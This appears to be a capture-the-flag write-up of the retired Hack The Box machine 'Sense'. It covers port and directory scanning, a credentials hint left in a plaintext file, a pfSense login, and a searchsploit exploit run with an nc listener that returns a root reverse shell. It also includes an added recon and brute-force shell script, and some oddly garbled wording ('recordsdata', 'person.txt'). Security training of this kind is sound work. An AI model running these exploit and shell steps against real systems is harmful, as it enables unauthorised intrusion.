Keep Calm and Hack The Box
Hack The Box (HTB) is an online platform that lets you test your penetration testing skills.
It contains a number of challenges that are constantly updated. Some of them simulate real-world scenarios and some of them lean more towards a CTF style of challenge.
Note: Only write-ups of retired HTB machines are allowed.
Sense is fairly easy overall. It demonstrates the dangers of bad password practices as well as of exposing internal files on a public-facing system.
We will use the following tools (Nmap, DirBuster, Searchsploit and Netcat) to pwn the box from a Kali Linux machine.
Let’s get started!
Step 1 – Reconnaissance
The first step before exploiting a machine is to do a little bit of scanning and reconnaissance.
This is one of the most important parts as it determines what you can try to exploit afterwards. It is always better to spend more time on this phase to gather as much information as you can.
I’ll use Nmap (Network Mapper). Nmap is a free and open source utility for network discovery and security auditing.
It uses raw IP packets to determine what hosts are available on the network, what services those hosts are offering, what operating systems they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.
There are many options you can use with this tool to scan the network. If you want to learn more about it, you can have a look at the documentation here.
I use the following command to perform an intensive scan:
nmap -A -v 10.10.10.60
-A: Enables OS detection, version detection, script scanning, and traceroute
-v: Increases the verbosity level
sense.htb: hostname for the Sense box (the command above targets its IP address, 10.10.10.60)
If you find the results a little bit too overwhelming, you can try this:
We can see that there are 2 open ports:
Port 80, most commonly used by the Hypertext Transfer Protocol (HTTP)
Port 443, the standard port for HTTP over TLS (HTTPS)
Still in the scanning and reconnaissance phase, I now use DirBuster. DirBuster is a multi-threaded Java application designed to brute force directory and file names on web/application servers.
You can launch DirBuster by typing this command in the terminal:
or by searching for the application:
The application looks like this, and lets you specify the target URL. In our case it will be https://10.10.10.60. You can select a wordlist containing the list of directories/files by clicking the Browse button:
I use directory-list-2.3-medium.txt for this search. We can see some interesting files here:
Step 2 – Visiting the recordsdata we received from the recon section
Let’s navigate to the changelog.txt file. It gives us more information about a security changelog, including which vulnerabilities were patched and the patching timeline.
Another interesting file is system-users.txt, which contains a username and a hint for the password.
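As an added example (this is not code from the original write-up), here is a small POSIX shell script that automates the recon phase of Steps 1 and 2 from the terminal: it runs Nmap in greppable output mode, extracts the open ports, replaces the DirBuster GUI with a curl loop over the same wordlist (probing each entry both bare and with a .txt extension, as DirBuster's file-extension option does), and then downloads the two files the write-up found. The function names, the Kali wordlist path /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt, and the sample Nmap output used to exercise the parser offline are all assumptions or constructed for this example.

```shell
#!/bin/sh
# recon.sh (added example, not the write-up's own code).
# Automates Step 1 and Step 2: nmap scan, open-port extraction, a curl-based
# file/directory brute force, and retrieval of the files DirBuster surfaced.

# Kali's copy of the DirBuster wordlist (assumed path; override via env).
WORDLIST=${WORDLIST:-/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt}
# Extension to append to every wordlist entry, like DirBuster's "File extension".
EXT=${EXT:-txt}

# Constructed sample of "nmap -oG" (greppable) output, used only to exercise
# open_ports without touching the network. It mirrors the two open ports the
# write-up found; it is not a real capture (real output separates fields
# with tabs, which the parser does not depend on).
SAMPLE_GNMAP='# Nmap scan (constructed sample)
Host: 10.10.10.60 () Status: Up
Host: 10.10.10.60 () Ports: 80/open/tcp//http///, 443/open/tcp//ssl|http/// Ignored State: filtered (998)'

# open_ports: read nmap -oG output on stdin and print "port/proto service"
# for every port whose state is "open". Greppable port entries look like
# 80/open/tcp//http//lighttpd 1.4.35/ and are separated by ", ".
open_ports() {
    awk -F'Ports: ' '/^Host:.*Ports:/ {
        n = split($2, entries, ", ")
        for (i = 1; i <= n; i++) {
            split(entries[i], f, "/")
            if (f[2] == "open") print f[1] "/" f[3] " " f[5]
        }
    }'
}

# dir_brute BASE_URL WORDLIST: request every wordlist entry (bare and with
# .$EXT) and print those that do not come back 404. -k accepts pfSense's
# self-signed certificate; -m 5 keeps a hung request from stalling the loop.
dir_brute() {
    base=$1
    list=$2
    while IFS= read -r word; do
        case $word in ''|'#'*) continue ;; esac
        for path in "$word" "$word.$EXT"; do
            code=$(curl -k -s -m 5 -o /dev/null -w '%{http_code}' "$base/$path")
            case $code in
                200|301|302|403) printf '%s %s/%s\n' "$code" "$base" "$path" ;;
            esac
        done
    done < "$list"
}

# main TARGET: full recon run against a live target.
main() {
    target=$1
    echo "[*] Open ports on $target"
    nmap -A -oG - "$target" | open_ports
    echo "[*] Brute forcing files and directories on https://$target"
    dir_brute "https://$target" "$WORDLIST"
    # The write-up's DirBuster run surfaced these two files; fetch them.
    for f in changelog.txt system-users.txt; do
        echo "[*] $f"
        curl -k -s -m 5 "https://$target/$f"
    done
}

# Run the live recon only when a target is given, e.g. ./recon.sh 10.10.10.60;
# with no argument the functions are merely defined (handy for sourcing).
if [ $# -gt 0 ]; then
    main "$1"
fi
```

The curl loop is sequential, so it is far slower than DirBuster's threads on a 220k-entry wordlist; it is meant to show what DirBuster is doing under the hood (one request per candidate path, keyed on the status code), not to replace it for large runs. Note that 403 is reported too: a forbidden path still tells you the file or directory exists.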
Step 3 – Visiting the online web page
Let’s navigate to the website. We see a pfSense login panel.
pfSense is an open source firewall/router computer software distribution based on FreeBSD. It is installed on a physical computer or a virtual machine to make a dedicated firewall/router for a network. It can be configured and upgraded through a web-based interface, and requires no knowledge of the underlying FreeBSD system to manage – Wikipedia
Let’s Google to see if we can find the default username and password for pfSense. Bingo! We do find some documentation on Netgate Docs.
I try the username Rohit and the password pfsense on the login page and I’m in! I have a look at the dashboard and any other information I can gather. We can see which specific version we’re on – 2.1.3-RELEASE (amd64).
Step 4 – Looking for an exploit
I use Searchsploit to check whether there is any known exploit. Searchsploit is a command line search tool for Exploit Database.
I use the following command:
I get more details on an exploit with:
searchsploit -x 43560.py
You can also check Exploit Database to find the same exploit.
I get the path of the exploit with:
searchsploit -p 43560.py
I can see where it is located on my Kali box. I copy the file into my Sense folder with:
cp /usr/share/exploitdb/exploits/linux/remote/43560.py .
and to check that it has been copied into this folder:
In one terminal (right side) I set up a listener with:
nc -nvlp 1234
I then run the exploit (left side) with:
python 43560.py --rhost 10.10.10.60 --lhost 10.10.14.13 --lport 1234 --username rohit --password pfsense
I got a shell as root!
I start gathering some basic information. id prints the user and group IDs of the current user, which confirms that we are root.
Step 5 – Looking for the person.txt flag
I navigate to the rohit folder under home.
I can list all the files/folders with the following command:
I then move to the home folder with:
And I find the user flag! I check the contents of the file with:
Step 6 – Looking for the root.txt flag
Let’s find the root flag now. I navigate to the root folder.
I find the root.txt file and check its contents with:
Congrats! You found both flags.
- Do not store sensitive information such as login credentials or your patching status in a plaintext file on the web server
- The pfSense application should be patched to the latest version (the command injection exploited here was fixed in later releases)
- Make sure to change the default password when you set up new applications/servers/platforms
- Apply the principle of least privilege to all your systems and services
Please don’t hesitate to ask questions or share with your friends 🙂
You can see more articles from the series Keep Calm and Hack the Box here.
And don’t forget to #GetSecure, #BeSecure & #StaySecure!